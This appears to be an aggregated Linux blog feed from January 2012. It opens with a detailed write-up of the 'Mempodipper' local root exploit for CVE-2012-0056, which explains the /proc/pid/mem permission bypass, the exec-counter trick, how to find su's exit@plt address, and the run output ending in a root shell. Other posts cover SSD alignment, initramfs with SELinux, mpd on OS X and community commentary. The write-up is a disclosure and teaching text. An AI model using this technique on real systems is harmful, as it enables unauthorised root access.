Posts for Sunday, January 22, 2012

Linux Local Privilege Escalation via SUID /proc/pid/mem Write

Introducing Mempodipper, an exploit for CVE-2012-0056. /proc/pid/mem is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process’s virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were deemed sufficient, and so the prior #ifdef that prevented write support for writing to arbitrary process memory was removed. Anyone with the correct permissions could write to process memory. It turns out, of course, that the permissions checking was done poorly. This means that all Linux kernels >=2.6.39 are vulnerable, up until the fix commit for it a couple days ago. Let’s take the old kernel code step by step and learn what’s the matter with it.

When /proc/pid/mem is opened, this kernel code is called:

static int mem_open(struct inode* inode, struct file* file)
	file->private_data = (void*)((long)current->self_exec_id);
	/* OK to pass negative loff_t, we can catch out-of-range */
	file->f_mode |= FMODE_UNSIGNED_OFFSET;
	return 0;

There are no restrictions on opening; anyone can open the /proc/pid/mem fd for any process (subject to the ordinary VFS restrictions). It simply makes note of the original process’s self_exec_id that it was opened with and stores this away for checking later during reads and writes.

Writes (and reads), however, have permissions checking restrictions. Let’s take a look at the write function:

static ssize_t mem_write(struct file * file, const char __user *buf,
			 size_t count, loff_t *ppos)
/* unimportant code removed for blog post */	
	struct task_struct *task = get_proc_task(file->f_path.dentry->d_inode);
/* unimportant code removed for blog post */
	mm = check_mem_permission(task);
	copied = PTR_ERR(mm);
	if (IS_ERR(mm))
		goto out_free;
/* unimportant code removed for blog post */	
	if (file->private_data != (void *)((long)current->self_exec_id))
		goto out_mm;
/* unimportant code removed for blog post
 * (the function here goes onto write the buffer into the memory)

So there are two relevant checks in place to prevent against unauthorized writes: check_mem_permission and self_exec_id. Let’s do the first one first and second one second.

The code of check_mem_permission simply calls into __check_mem_permission, so here’s the code of that:

static struct mm_struct *__check_mem_permission(struct task_struct *task)
	struct mm_struct *mm;
	mm = get_task_mm(task);
	if (!mm)
		return ERR_PTR(-EINVAL);
	 * A task can always look at itself, in case it chooses
	 * to use system calls instead of load instructions.
	if (task == current)
		return mm;
	 * If current is actively ptrace'ing, and would also be
	 * permitted to freshly attach with ptrace now, permit it.
	if (task_is_stopped_or_traced(task)) {
		int match;
		match = (ptrace_parent(task) == current);
		if (match && ptrace_may_access(task, PTRACE_MODE_ATTACH))
			return mm;
	 * No one else is allowed.
	return ERR_PTR(-EPERM);

There are two ways that the memory write is authorized. Either task == current, meaning that the process being written to is the process writing, or current (the process writing) has esoteric ptrace-level permissions to play with task (the process being written to). Maybe you think you can trick the ptrace code? It’s tempting. But I don’t know. Let’s instead figure out how we can make a process write arbitrary memory to itself, so that task == current.

Now naturally, we want to write into the memory of suid processes, since then we can get root. Take a look at this:

$ su "yeeeee haw I am a cowboy"
Unknown id: yeeeee haw I am a cowboy

su will spit out whatever text you want onto stderr, prefixed by “Unknown id:”. So, we can open a fd to /proc/self/mem, lseek to the right place in memory for writing (more on that later), use dup2 to couple together stderr and the mem fd, and then exec to su $shellcode to write an shell spawner to the process memory, and then we have root. Really? Not so easy.

Here the other restriction comes into play. After it passes the task == current test, it then checks to see if the current self_exec_id matches the self_exec_id that the fd was opened with. What on earth is self_exec_id? It’s only referenced a few places in the kernel. The most important one happens to be inside of exec:

void setup_new_exec(struct linux_binprm * bprm)
/* massive amounts of code trimmed for the purpose of this blog post */
	/* An exec changes our domain. We are no longer part of the thread
	   group */
	flush_signal_handlers(current, 0);

self_exec_id is incremented each time a process execs. So in this case, it functions so that you can’t open the fd in a non-suid process, dup2, and then exec to a suid process… which is exactly what we were trying to do above. Pretty clever way of deterring our attack, eh?

Here’s how to get around it. We fork a child, and inside of that child, we exec to a new process. The initial child fork has a self_exec_id equal to its parent. When we exec to a new process, self_exec_id increments by one. Meanwhile, the parent itself is busy execing to our shellcode writing su process, so its self_exec_id gets incremented to the same value. So what we do is — we make this child fork and exec to a new process, and inside of that new process, we open up a fd to /proc/parent-pid/mem using the pid of the parent process, not our own process (as was the case prior). We can open the fd like this because there is no permissions checking for a mere open. When it is opened, its self_exec_id has already incremented to the right value that the parent’s self_exec_id will be when we exec to su. So finally, we pass our opened fd from the child process back to the parent process (using some very black unix domain sockets magic), do our dup2ing, and exec into su with the shell code.

There is one remaining objection. Where do we write to? We have to lseek to the proper memory location before writing, and ASLR randomizes processes address spaces making it impossible to know where to write to. Should we spend time working on more cleverness to figure out how to read process memory, and then carry out a search? No. Check this out:

$ readelf -h /bin/su | grep Type
  Type:                              EXEC (Executable file)

This means that su does not have a relocatable .text section (otherwise it would spit out “DYN” instead of “EXEC”). It turns out that su on the vast majority of distros is not compiled with PIE, disabling ASLR for the .text section of the binary! So we’ve chosen su wisely. The offsets in memory will always be the same. So to find the right place to write to, let’s check out the assembly surrounding the printing of the “Unknown id: blabla” error message.

It gets the error string here:

  403677:       ba 05 00 00 00          mov    $0x5,%edx
  40367c:       be ff 64 40 00          mov    $0x4064ff,%esi
  403681:       31 ff                   xor    %edi,%edi
  403683:       e8 e0 ed ff ff          callq  402468 (dcgettext@plt)

And then writes it to stderr:

  403688:       48 8b 3d 59 51 20 00    mov    0x205159(%rip),%rdi        # 6087e8 (stderr)
  40368f:       48 89 c2                mov    %rax,%rdx
  403692:       b9 20 88 60 00          mov    $0x608820,%ecx
  403697:       be 01 00 00 00          mov    $0x1,%esi
  40369c:       31 c0                   xor    %eax,%eax
  40369e:       e8 75 ea ff ff          callq  402118 (__fprintf_chk@plt)

Closes the log:

  4036a3:       e8 f0 eb ff ff          callq  402298 (closelog@plt)

And then exits the program:

  4036a8:       bf 01 00 00 00          mov    $0x1,%edi
  4036ad:       e8 c6 ea ff ff          callq  402178 (exit@plt)

We therefore want to use 0×402178, which is the exit function it calls. We can, in an exploit, automate the finding of the exit@plt symbol with a simple bash one-liner:

$ objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'

So naturally, we want to write to 0×402178 minus the number of letters in the string “Unknown id: “, so that our shellcode is placed at exactly the right place.

The shellcode should be simple and standard. It sets the uid and gid to 0 and execs into a shell. If we want to be clever, we can reopen stderr by, prior to dup2ing the memory fd to stderr, we choose another fd to dup stderr to, and then in the shellcode, we dup2 that other fd back to stderr.

In the end, the exploit works like a charm with total reliability:

CVE-2012-0056 $ ls  mempodipper.c  shellcode-32.s  shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper 
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami

You can watch a video of it in action:
<object height="480" width="640"><param name="movie" value=";hl=en_US"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed allowfullscreen="true" allowscriptaccess="always" height="480" src=";hl=en_US" type="application/x-shockwave-flash" width="640"></embed></object>

As always, thanks to Dan Rosenberg for his continued advice and support. I’m currently not releasing any source code, as Linus only very recently patched it. After a responsible amount of time passes or if someone else does first, I’ll publish. If you’re a student trying to learn about things or have otherwise legitimate reasons, we can talk.

Update: evidently, based on this blog post, ironically, some other folks made exploits and published them. So, here’s mine. I wrote the shellcode for 32-bit and 64-bit by hand. Enjoy!

Update 2: as it turns out, Fedora very aptly compiles their su with PIE, which defeats this attack. They do not, unfortunately, compile all their SUID binaries with PIE, and so this attack is still possible with, for example, gpasswd. The code to do this is in the “fedora” branch of the git repository, and a video demonstration is also available.

{As always, this is work here is strictly academic, and is not intended for use beyond research and education.}


Best background music ever.

From Orisinal: Morning Sunshine:

emerge -av swftools
swfextract -s 31 carrot.swf -o carrot.mp3
mplayer -loop 0 carrot.mp3

Or replace with any other Orisinal song :)

Orisinal - Carrot Track

Note: -s 31 depends on the sound index number, which may be different – do swfextract foo.swf to check.

No related posts.

Posts for Friday, January 20, 2012

Gnome Documentation – A second chance

Perhaps not all is lost. This walkthrough/reference appears to be a more interesting (official) take on how to program Gnome GTK+.

Posts for Thursday, January 19, 2012


Hadron ve Türkçe [Turkish]

Özgürlükİçin’deki yorumları görene kadar bir sıkıntı yoktu.. Gerçi halen yok da, bir belirtmek istediğim nokta var Hadron ile alakalı.

  • Hadron’da neden Türkçe desteği yok? 

Neden olsun ki? Gerçekten soruyorum, yorumlarınızı bekliyorum. Neden Türkçe destek koyalım?

1 yıldır #hadron kanalındayız, girene Türkçe-İngilizce anlatıyoruz olayı. Wiki var, orda yarım yamalak Türkçe desteği var, isteyen girip devamını getirebiliyor. (Kaç kişi geldi o da ayrı soru, neyse.)

2-3 kişiyiz be, “iki” ve “üç” diye okunuyor.. Maaş falan da almıyoruz, boş vakitlerimizde oyun oynamak yerine deneysel birşeyler yapıyoruz. Soruyorum, gerçekten.. “Sıfırdan oluşturulmuş” bir paket yönetim sisteminin ana paket deposundaki paketleri geliştirmek, daha fazla paket eklemek, paketleri güncel tutmak, son kullanıcıya[1] gerçekten faydalı olabilecek bir paket yönetim sistemi haline getirmek yerine, çoğunluğu bir hevesle girip de “aaa bunda compiz yokmuş” diye geri uzaklaşacak bir topluluk olan “Türk Linux Camiası”[2] için neden Türkçe belgeler ile uğraşalım?

Sonu diğerlerine benzeyecek” belki gerçekten Hadron’un, haklısınız. Ama kimse size girip de “bu dağıtımı kullanın, mükemmel birşey bu, Hadron ile her şey mümkün!!!1!” demiyor ki. Daha geliştiriyoruz, bitmedi, bitmeyi bırak başlamadı bile :) Girip “yaaa Türkçe yok bunda, tırt bu” diyeceğine, biraz kafa çalıştırıp “hmm demek ki hazır değil henüz benim kullanabileceğim kadar” diye düşünmek çok mu zor?

Hadron’da ne yapmaya çalıştığımızı anlamak için, anlamak istiyorsanız, Gentoo nasıl çalışır, USE flag nedir, paket yöneticisi ne işe yarar, program nasıl derlenir gibi zımbırtıları inceleyin. Denemek/geliştirmek/çevirmek(ki sadece Türkçe değil, dünya üzerinde konuşulan istediğin bir dile) isteyene kapımız sonuna kadar açık, o kadar açık kaldı ki kapı, soğuk algınlığı başladı bizde..

[1] Ne yaptığını bilen son kullanıcıdan bahsediyoruz
[2] Tamam tamam, sen tabi ki istisnasın, aslanım benim..

Zabbix 1.8.9 Debian Squeeze Backport

I was beginning to get hit by many bad things in the Debian Squeeze zabbix 1.8.2 package.  If you aren’t aware, zabbix is a nifty data center monitoring system and is only slightly annoying compared to most other systems which are very annoying to set up and use.

Most notably, this package will safely run on PostgreSQL 9.1 from squeeze-backports and contains many performance improvements.  It should be a drop in upgrade for the distro package.

Get it here:

No related posts.

Posts for Wednesday, January 18, 2012

FOSDEM from Paris

I just moved to Paris, which means I’m finally in the right proximity at the right time for attending an open source conference. I’m not sure what the scoop is with the Parsian KDE community — if it exists or is vibrant, if there’s camaraderie, or what the situation is. But, in case there is a good vibe brewing inside the Paris OSS community, what do you say we all band together to attend FOSDEM. Leave our city for Brussels in a festive caravan on Friday night (or possibly just a train) and come back Sunday night? If there’s interest, email me at jason [at] zx2c4 dot com or leave a comment below.

Qt Documentation

Gnome documentation needs to be more like Qt’s.

The ball’s in Gnome’s court now. They really need to step up their game.

Thank you for the kind commenter on the last post for pointing this out.

If you’re in Europe, go to Monki Gras

To my European readers: if you care about the impact of social technologies like Git (and GitHub) & how they’re transforming software development, or the impact of social technology on communities, and you enjoy good beer, you need to be at Monki Gras. I just posted over at my RedMonk blog about how the previous conference in the series, Monktoberfest, was the best conference of my life. And I’ve been to many.

Monki Gras is Feb. 1–2 in London. The timing’s perfect to stop by just before FOSDEM (and that’s exactly what I’m doing). Registration is dirt-cheap, speakers are universally top-notch, and you’ll also get some world-class beers in the package.

Tagged: community, development, gentoo

Posts for Tuesday, January 17, 2012

Program or be programmed?

Yesterday Douglas Rushkoff, who always manages to get me to think, published a column titled “Why I am learning to code and you should, too” in which he outlined his reasons for signing up with Codeacademy (Codeacademy is a service that offers free online exercises teaching complete newbies programming Javascript):

Learning to code means being able to imagine a new way of using the camera in your iPhone, or a new way for people to connect to each other, and then being able to bring that vision to reality.

He wrote about a similar perspective in his book titled “Program or be programmed”, which I reviewed here and which I totally ripped off for this post’s title. The idea is simple: More and more of our daily life gets digitalized, processed by algorithms and programs and we have to live with whatever those magic black boxes provide us with. And if we have no clue about how programming and algorithmic thinking works, we will have no clue about how the data some services spew our way might have been created and how we could influence it. Not being able to program makes us very powerless in a world where most things are done by programs, programs other people wrote.

Now we could force everyone to learn at least one programming language (in fact that topic came up in the discussion around my recent [German] talk borrowing the same title as this blogpost) where Jens Ohlig coined the brilliant phrase: “Maybe programming is this generation’s Latin?”

But that perspective is in a certain way very elitist. I know how to program, you reading this blog probably do, too. But many many people don’t and not cause of lazyness or not caring. Learning how to program takes time (that you can’t spend earning your livelyhood), it takes considerable resources (you need a computer for example and probably an internet connection) and it takes a certain mindset not everybody has. There are artists who program and use those tools to create brilliant pieces of beauty just as there are financial analysts that couldn’t code a simple Excel macro to save their lives. But it would be ignorant to deny that certain personality traits do make learning programming easier: Programming is very formal, structured and very abstract. You need a very analytical mind to learn it properly.

I don’t deny Rushkoff’s or Ohlig’s train of thought. In fact I deeply support it. But I don’t think that throwing a Javascript or Python tutorial people’s way will help anyone who’s not already halfway there.

In a certain way I think Facebook is a great case study here. Internet savvy people often joke about people whose whole internet is Facebook (just as people joked about the internet being more than “the web” before). The fact is: You might not like Facebook for whatever reasons (privacy, blue design, the interface, data portability or whatever) but when it comes to keeping track of your contacts, managing event invitations, chatting and sharing funny pictures Facebook just works. Yes, many are not using it “right” or “smart” or get all out of it they could, but they get the stuff they care about done.

And that is what we have to start building. In the discussions around my talk Michael Seemann brought up the open source movement as something he thought provided a good model for our future: In open source not everybody checks the code, very few do, but everybody could (or pay someone to do it for them). He proposed to create data management and “programming” tools in an open source way, that hide all of the uglyness from the user and empower them to get stuff done quickly even if they don’t understand the basics.

For a long time I have kinda argued against that idea. I thought that we should make programming languages simple (which is why I like Python) but that abstracting away too much of the internals would still leave people powerless. And to a certain degree I was and am right: People only using the abstracted tool will never be as powerful as the people using all of the potential a “real” programming language provides.

But, and here I changed my perspective, let’s come back to the Facebook example: Yes people whose internet is Facebook miss out on many brilliant things. But they are online, they can talk to many many people all over the world, can find new interests and broaden their horizon.

In a certain way it is just as it is with writing. Yes, “everybody” can write in the first world countries (not really, there are people who just can’t learn it properly) but not everybody can write a great novel. Hell many people can’t even write a semi-structured text summarizing their thoughts on a certain matter.

I think we’ll have to define our “minimum skill level of programming” that we teach people. That doesn’t mean that we should force all our kids through C, Java or Ruby courses. Maybe a simpler, more generic, less powerful language could be used. Something that kinda explains how dataflows work how computers “think” without dealing with functions and memory allocation?

I am not a teacher. I’m also not great at explaining things. But I do believe that teachers and hackers should maybe see if they can come up with a middle ground between “I can click the login button on the Facebook page” and “I write my own kernel in assembler”.

How do you think that middle ground could look? Do you believe we should teach everybody in school programming? I’d love to read your comments!

flattr this!

Gnome Documentation

Why does developer documentation have to be SO boring. I mean, I realize as a computer programmer I should totally be loving this stuff like its the most interesting thing in the world, but as much as I lie to myself like that, I just can’t bring myself to believe it. Its horrible. Its bland. Its dry. Sometimes I think perhaps its the formatting. I, for example, don’t mind reading the Java 7 API when programming in Java.

Maybe I just wasn’t cut for this stuff. Who knows?

Posts for Monday, January 16, 2012


Music Player Daemon on OS X

I use a Mac Mini with OS X 10.5.8 as a media center connected to my TV and I wanted to install Music Player Daemon on it so I could control the music remotely from my laptop or phone. I mostly followed the OS X guide from MPD’s wiki to do it but I ran into some problems while trying to daemonize mpd.

I got the following error while running mpd without –no-daemon:

The process has forked and you cannot use this CoreFoundation functionality safely. You MUST exec().

When I ran mpd –no-daemon everything was fine though. So in order to “solve” this problem I’ve changed the plist file to include a screen invocation.

My mpd.plist looks like that now:

<code2><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "">
<plist version="1.0">
        <string>screen</string> <!-- path to screen -->
        <string>/opt/local/bin/mpd</string> <!-- path to MPD -->
        <string>/Users/kargig/.mpd/mpd.conf</string> <!-- path to MPD config -->
        <string>/opt/local/bin/mpd</string> <!-- path to MPD, again -->
        <string>/Users/kargig/.mpd/mpd.conf</string> <!-- path to MPD config, again -->

So launchctl calls daemondo which calls screen which runs mpd –no-daemon, so mpd doesn’t crash.

I use mpdscribble for scrobbling my music to Clients-wise, I use Theremin on OS X, Gnome Music Player Client/gmpc on Debian Linux and MPDroid on Android. And all those connections over IPv6 of course, over my LAN’s Unique Local Addresses to be exact, mpd and all clients listed above work fine with IPv6.

<code2> # lsof -n -i | grep ESTABLISHED | grep 6600
mpd       43025         kargig   12u  IPv6 0x49c719c      0t0    TCP [fdbf:aaaa:aab0:447d:216:XXff:feaa:11XX]:6600->[fdbf:aaaa:aab0:447d:222:XXff:fe1e:d8XX]:48703 (ESTABLISHED)
mpd       43025         kargig   15u  IPv6 0x3127cd4      0t0    TCP [fdbf:aaaa:aab0:447d:216:XXff:feaa:11XX]:6600->[fdbf:aaaa:aab0:447d:fadb:XXff:fe4f:aXX]:51113 (ESTABLISHED)

Apart from MPD’s wiki there’s another nice blog post you can read to help you install mpd on OS X, Integrating MPD with OS X.
For general reference on setting up mpd, Archilinux has a fine wiki entry.

Posts for Sunday, January 15, 2012


Trying out initramfs with selinux and grsec

I’m no fan of initramfs. All my systems boot up just fine without it, so I often see it as an additional layer of obfuscation. But there are definitely cases where initramfs is needed, and from the looks of it, we might be needing to push out some documentation and support for initramfs. Since my primary focus is to look at a hardened system, I started playing with initramfs together with Gentoo Hardened, grSecurity and SELinux. And what a challenge it was…

But first, a quick introduction to initramfs. The Linux kernel supports initrd images for quite some time. These images are best seen as loopback-mountable images containing a whole file system that the Linux kernel boots as the root device. On this initrd image, a set of tools and scripts then prepare the system and finally switch towards the real root device. The initrd feature was often used when the root device is a network-mounted location or on a file system that requires additional activities (like an encrypted file system or even on LVM. But it also had some difficulties with it.

Using a loopback-mountable image means that this is seen as a full device (with file system on it), so the Linux kernel also tries caching the files on it, which leads to some unwanted memory consumption. It is a static environment, so it is hard to grow or shrink it. Every time an administrator creates an initrd, he needs to carefully design (capacity-wise) the environment not to request too much or too little memory.

Enter initramfs. The concept is similar: an environment that the Linux kernel boots as a root device which is used to prepare for booting further from the real root file systems. But it uses a different approach. First of all, it is no longer a loopback-mountable image, but a cpio archive that is used on a tmpfs file system. Unlike initrd, tmpfs can grow or shrink as necessary, so the administrator doesn’t need to plan the capacity of the image. And because it is a tmpfs file system, the Linux kernel doesn’t try to cache the files in memory (as it knows they already are in memory).

There are undoubtedly more advantages to initramfs, but let’s stick to the primary objective of this post: talk about its implementation on a hardened system.

I started playing with dracut, a tool to create initramfs archives which is seen as a widely popular implementation (and suggested on the gentoo development mailinglist). It uses a simple, modular approach to building initramfs archives. It has a base, which includes a small init script and some device handling (based on udev), and modules that you can add depending on your situation (such as adding support for RAID devices, LVM, NFS mounted file systems etc.)

On a SELinux system (using a strict policy, enforcing mode) running dracut in the sysadm_t domain doesn’t work, so I had to create a dracut_t domain (which has been pushed to the Portage tree yesterday). But other than that, it is for me sufficient to call dracut to create an initramfs:

# dracut -f "" 3.1.6-hardened

My grub then has an additional set of lines like so:

title Gentoo Linux Hardened (initramfs)
root (hd0,0)
kernel /boot/vmlinuz-3.1.6-hardened root=/dev/vda1 console=ttyS0 console=tty0
initrd /boot/initramfs-3.1.6-hardened.img

Sadly, the bugger didn’t boot. The first problem I hit was that the Linux kernel I boot has chroot restrictions in it (grSecurity). These restrictions further tighten chroot environments so that it is much more difficult to “escape” a chroot. But dracut, and probably all others, use chroot to further prepare the bootup and eventually switch to the chrooted environment to boot up further. Having the chroot restrictions enabled effectively means that I cannot use initramfs environments. To work around, I enabled sysctl support for all the chroot restrictions and made sure that their default behavior is to be disabled. Then, when the system boots up, it enables the restrictions later in the boot process (through the sysctl.conf settings) and then locks these settings (thanks to grSecurity’s grsec_lock feature) so that they cannot be disabled anymore later.

But no, I did get further, up to the point that either the openrc init is called (which tries to load in the SELinux policy and then breaks) or that the initramfs tries to load the SELinux policy – and then breaks. The problem here is that there is too much happening before the SELinux policy is loaded. Files are created (such as device files) or manipulated, chroots are prepared, udev is (temporarily) ran, mounts are created, … all before a SELinux policy is loaded. As a result, the files on the system have incorrect contexts and the moment the SELinux policy is loaded, the processes get denied all access and other privileges they want against these (wrongly) labeled files. And since after loading the SELinux policy, the process runs in kernel_t domain, it doesn’t have the privileges to relabel the entire system, let alone call commands.

This is currently where I’m stuck. I can get the thing boot up, if you temporarily work in permissive mode. When the openrc init is eventually called, things proceed as usual and the moment udev is started (again, now from the openrc init) it is possible to switch to enforcing mode. All processes are running by then in the correct domain and there do not seem to be any files left with wrong contexts (since the initramfs is not reachable anymore and the device files in /dev are now set again by udev which is SELinux aware.

But if you want to boot up in enforcing straight away, there are still things to investigate. I think I’ll need to put the policy in the initramfs as well (which has the huge downside that every update on the policy requires a rebuild of the initramfs as well). In that case I can load the policy early up the chain and have the initramfs work further running in an enforced situation. Or I completely regard the initramfs as an “always trusted” environment and wait for openrc’s init to load the SELinux policy. In that case, I need to find a way to relabel the (temporarily created) /dev entries (like console, kmsg, …) before the policy is loaded.

Definitely to be continued…

Posts for Friday, January 13, 2012

Valadate git repository

The Valadate repository is actually on Yorba’s website. Which if you check shows that the project is far from dead like the gitorious project page would have you believe.

Valadate can be found here:

Posts for Thursday, January 12, 2012


Yup, boredom creates another distro

Hadron GNU/Linux 1.0 (a.k.a. Dennis Ritchie) is out. So you’ll probably say “what?”.

We’re trying to create a distro which is source based, fast and follows KISS principles. Package manager of Hadron is lpms, which has written from scratch (with python). And uses portage-like trees as software repositories. We don’t hurry. And I mean really few people while calling us “we”.

We also have a wiki and a channel named #hadron on freenode IRC server. Please feel free to try and hang around. We need more manpower.


Update: I saw some comments about Hadron like “What is the point”. Take it easy guys. We didn’t say that is the best lion in the arena. We’re just bored :)

HowTo: Use a config.vapi file with CMake

If you want to use a config.vapi file with your Vala project here are the basics.

  1. Setup your CMake files in your project. I use these.
  2. In your main CMakeLists.txt file you’ll need to add:
  3. Finally, you’ll need to, of course, create a vapi directory.

Sadly, during my first adventure in the Vala world it took me quite a while to figure that out. The kind of thing that makes you feel retarded.

Posts for Wednesday, January 11, 2012


Linux SSD partition alignment tips

Yes, this is another post on the internet about properly aligning your SSD partitions on Linux. It’s mostly my notes that I have gathered from other posts around the net. Please read the whole post before starting to create partitions on your SSD.

I bought myself a brand new SSD for Xmas, OCZ Agilty 3 120Gb. But I also bought a CDROM caddy so that I could replace my useless macbook CDROM drive, last time I used it was probably 2009 or 2010. So my plan was to put the old, original macbook SATA hard disk inside the caddy and use the SSD as the primary one. Sounds easy right ? Well you just need patience, lots of patience in order to remove all necessary screws in order to get the CDROM drive out and replace it with the caddy. Instructions for this procedure can be found at

Create Partitions on the SSD disk
Before one begins some definitions!

Heads = Tracks per cylinder
Sectors = Sectors per track

The goal here is to have the partitions aligned to the SSD’s Erase Block Size.
Googling around the net I found out that OCZ always uses 512Kb as Erase Block Size. If one uses fdisk with 32 Heads and 32 Sectors that makes a cylinder size of 1024b = 1Kb. Multiplying with 512 (sector size), which is fdisk’s default unit size, that makes it 512kb (=32*32*512)! Exactly the Erase Block Size that’s needed. So one needs to start fdisk issuing the following command:
# fdisk -H32 -S32 /dev/sdb
where /dev/sdb is the SSD.

It is very important to remember to start the first partition from the 2nd unit (or 512th cylinder if you prefer). Due to MS-DOS compatibility if the first partition were to start at the first cylinder, it would skip one track. So it would actually start at 32(sectors)*512(sector size)=16Kb, messing up the alignment.

Then create necessary partitions as needed.

LVM alignment
So, the partitions on the SSD are aligned, but what if one wants to use LVM ? Then LVM’s overhead has to be taken into account as well.
To create an aligned PV based on the partitions that have already been created one needs to use the “–dataalignment” option found in newer versions of LVM utilities.
# pvcreate --dataalignment 512k /dev/sdb3
To check the alignment use the following command:

<code2># pvs /dev/sdb3 -o+pe_start
  PV         VG   Fmt  Attr PSize   PFree  1st PE 
  /dev/sdb3  ssd  lvm2 a-   111.46g 81.46g 512.00k

Check that “1st PE” is what is actually needed for the alignment.

Proceed creating VGs and LVs as needed.

Formatting Partitions with ext4
There’s no reason to use ext3 on SSD, one needs to take advantage of ext4 SSD features. I prefer 4K as block size.
For a further explanation of the following formulas read Linux RAID Wiki – RAID setup
stride = chunk (Sector size) / block size = 512Kb / 4K = 128
stripe-width is usually calculated by a formula that uses multiple disks. Since there’s only one disk in this scenario, stripe-width is equal to stride.
stripe-width = 128

# mkfs.ext4 -O extent -b 4096 -E stride=128,stripe-width=128 /dev/mapper/ssd-debian

Mounting the partition
To enable SSD TRIM support, which protects the disk from wearing off, one needs to enable the discard option while mounting the partition. Edit /etc/fstab and add the discard mount option (and noatime if you want to).
/dev/mapper/ssd-deb / ext4 discard,noatime,errors=remount-ro 0 1

Note 1: As of 2.6.37 Linux Kernel supports TRIM on device mapper. Previous kernel versions will report errors upon trying to mount an LVM partition with discard mount option. If you have an older kernel either don’t use LVM on your SSD yet or upgrade your kernel!
Note 2: Read the links posted below for a complete blog post over TRIM command. Apparently it’s not always the best choice

That’s basically it…

Extra – copying the old root partition to the new disk

<code2># mkdir /mnt/ssd/
# mount /dev/mapper/ssd-debian /mnt/ssd/
# rsync -aPEHv --exclude=/dev --exclude=/proc --exclude=/sys --exclude=/mnt --exclude=/var/cache/apt/archives/ / /mnt/ssd/
# mkdir /mnt/ssd/dev
# mkdir /mnt/ssd/proc
# mkdir /mnt/ssd/sys
# mkdir /mnt/ssd/mnt
# cp -avp /dev/console /mnt/ssd/dev/
# cp -avp /dev/urandom /mnt/ssd/dev/
# cp -avp /dev/zero /mnt/ssd/dev/
# cp -avp /dev/random /mnt/ssd/dev/
# Edit /mnt/ssd/etc/fstab to change the device names
# Update grub

Using the above commands one avoids copying unneeded directories like /dev, /sys, etc that will be recreated later. Don’t forget to at least copy the above 4 devices in the new /mnt/ssd/dev dir, else the partition won’t be bootable.

1. Aligning Filesystems to an SSD’s Erase Block Size (link goes to since original article has unfortunately disappeared from the web)
2. [linux-lvm] Re: Aligning PVs on SSDs?
3. Aligning an SSD on Linux (excellent article!)
4. ArchWiki – Solid State Drives
5. SSD performance tips for RHEL6 and Fedora
6. Re: [dm-devel] trim support (discard)
7. How to check TRIM is working on your SSD running Linux
8. Impact of ext4′s discard option on my SSD (very useful insight on TRIM command, read the comments as well)

Thanks fly to @apoikos for helping me with the CDROM replacement and @faidonl for his original SSD alignment tips :)

Compiling firefox-9.0 on linux PPC

The good point is that yes!, it is possible to compile firefox 8.0 or 9.0 on linux-ppc. General point of view The mozilla foundation has stopped supporting the PPC platform for firefox starting with version 4.0. Gentoo ebuilds, quite understandably, followed upstream by removing ppc keywords for all firefox ebuilds >=4.0. Though… I still have [...]

Google+ Your World

So half the Internet is up in arms again because of Google’s recent changes to their search engine: For users with a Google+ account, Google mixes information from the users social network into the search results.

Now we read complaints about how bad that is, how Google’s search results will get worse and the term “Filter Bubble” is being thrown around like it was solving anything. But in fact it is simple.

Google aims to become your one search engine. You might want that or you might not want that, but from a business sense it is perfectly logical. Google indexes a lot of the stuff already out there and tries to gauge its relevance to your searches, but your own data, your shared links and photos as well as the links your contacts posted (and therefore tried bringing to your attention) have been sort of inaccessible to Google’s search engine. This changed.

Why are people upset? It’s mostly due to the wrong belief that there is some sort of objective relevance certain things have in regards to certain queries: For every question there is one best answer. Which is really stupid actually.

When I include “python” in my search terms that usually means that I am looking for programming related results (I use Python a lot) and not snakes or a group of British comedians. My social circle on Google+ reflects that with many python devs in it. So it makes perfect sense for Google to use that information to weed out more irrelevant results for me.

The complaint that Google could use that to manipulate you might have certain merit but that hasn’t changed through adding the social factor: I have to trust every search engine I use to not hide or show certain results out of malice. If I want to circumvent that you can use search engine proxies that ask the engines anonymously or you gotta build some sort of meta engine, that merges the results of different search products. All very valid approaches but Google’s inclusion of their social network hasn’t changed the problems in this aspect at all.

In the end it’s about time management. I hate searching, cause I wanna do stuff. Searching is just time I have to invest to be able to do stuff so everything that cuts that time down makes sense to me. I am aware of the dangers of personalized search which is why I have also a proxyed search included in my browser but I’m not willing to throw away the benefits of a better tailored search engine for some sort of “maybe, you never know” sort of “dangers”.

flattr this!

Posts for Tuesday, January 10, 2012

Configuration Management Software Sucks

Yes.  Configuration Management Software Sucks.  Horribly.

The main problem is that n-th order tweakability is preferred over convention.  It’s just stupid.  There are a core set of things that just about everybody needs to do.  Those should be dead simple.  Ready to uncomment and run.  The set operating systems used in the enterprise is fairly small:  RHEL5, RHEL6, Debian 6, Ubuntu LTS.  A configuration system should be opinionated and have complete out of the box support for these platforms.  Simple rulesets for the basics that nearly everyone uses should be ready to go..  package management, process initialization, file management, ssh, sudo, DNS, Apache, PAM, PostgreSQL, MySQL, OpenLDAP, etc.  Keep it simple.  Keep it simple.  Keep it simple.  Resist all urges to add complexity.

That’s not the case.

You’d think after 30 years of Unix, BSD and Linux network deployments this would be pretty well trodden ground.  Wrong.  It’s a complete crapshoot and everybody does things differently.  Pick your poisons and reinvent the stack ad infinitum.

This is one of the few areas I’m green with envy of the Microsoft side of the fence.  Between Active Directory, Group Policy,  and maybe a third party tool or two for cloning and installs and such, Microsoft environments can easily be set up and managed well by complete morons (and often are).


Puppet seems to have potential.  Of course, out of the box you’re pissing in the wind with a blank slate and most books and sites will have you following tutorials to rewrite rulesets that thousands of other people before you have similarly cobbled poorly together.  As a Ruby project, it unsurprisingly has vocal hipster fanboys.  Unfortunately, they forgot to parrot their DRY principle to each other.

